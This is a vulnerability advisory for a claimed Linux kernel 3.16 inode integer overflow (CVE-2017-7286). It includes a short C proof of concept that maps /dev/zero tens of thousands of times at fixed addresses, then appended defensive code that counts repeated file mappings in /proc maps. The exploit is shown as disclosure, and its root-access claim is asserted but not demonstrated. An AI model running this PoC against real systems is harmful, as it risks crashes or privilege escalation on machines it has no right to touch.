[+] Title: Linux kernel 3.16.0-28 - Integer overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-7286

Vendor:
===============
https://www.kernel.org/

Vulnerability Type:
===================
"inode" Integer overflow

Exploit:
===================
// INODE can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access.
// gcc buffer.c -o buffer
// $ ./buffer
// Segmentation Fault

#include <sys/types.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(void){
    int fd, i;

    fd = open("/dev/zero", O_RDONLY);

    /* Map the same descriptor repeatedly, one mapping every 0x10000 bytes. */
    for(i = 0; i < 26999; i++){
        mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
    }
    return 0;
}

CVE Reference:
===============
CVE-2017-7286

Tested on:
===============
Linux ubuntu 3.16.0-28 x86_64
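
For triage on a host, the mapping pattern the PoC above creates (one file mapped many times at 0x10000 strides) shows up in /proc/<pid>/maps. The following is an added example, not part of the original advisory: it counts mappings per backing path in maps-format text. The function name, the 32-entry table limit and the sample lines are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

struct path_count { char path[128]; unsigned n; };
/* Constructed sample in /proc/<pid>/maps format (not captured output). */
static const char SAMPLE_MAPS[] =
    "00010000-00011000 r--s 00000000 00:05 41001 /dev/zero (deleted)\n"
    "00020000-00021000 r--s 00000000 00:05 41002 /dev/zero (deleted)\n"
    "00030000-00031000 r--s 00000000 00:05 41003 /dev/zero (deleted)\n"
    "7f3a1c000000-7f3a1c1bd000 r-xp 00000000 08:01 131090 /lib/libc.so.6\n"
    "7ffd5a1e0000-7ffd5a201000 rw-p 00000000 00:00 0 [stack]\n";

/* Largest number of mappings sharing one backing path; the winning entry is
 * copied to *top. Keyed on the path column, so mappings of one file name are
 * counted together whatever inode number each line shows. */
unsigned max_mappings_per_path(const char *maps, struct path_count *top)
{
    struct path_count tab[32];      /* distinct paths tracked (assumed limit) */
    size_t used = 0, i;
    unsigned best = 0;
    while (*maps) {
        char line[256], path[128];
        unsigned long ino;
        size_t len = strcspn(maps, "\n");
        snprintf(line, sizeof line, "%.*s", (int)len, maps);
        maps += len + (maps[len] == '\n');
        /* range perms offset dev inode path; inode 0 means not file-backed */
        if (sscanf(line, "%*s %*s %*s %*s %lu %127[^\n]", &ino, path) != 2 || !ino)
            continue;
        for (i = 0; i < used && strcmp(tab[i].path, path) != 0; i++) {}
        if (i == used) {
            if (used == sizeof tab / sizeof tab[0])
                continue;           /* table full: ignore further new paths */
            strcpy(tab[used].path, path);
            tab[used++].n = 0;
        }
        if (++tab[i].n > best) {
            best = tab[i].n;
            if (top) *top = tab[i];
        }
    }
    return best;
}

int main(void)
{
    struct path_count top = { "", 0 };
    printf("%u mappings of %s\n", max_mappings_per_path(SAMPLE_MAPS, &top), top.path);
    return 0;
}
```

To inspect a live process, read /proc/<pid>/maps into a buffer and pass it in; what count is worth alerting on is a local policy choice.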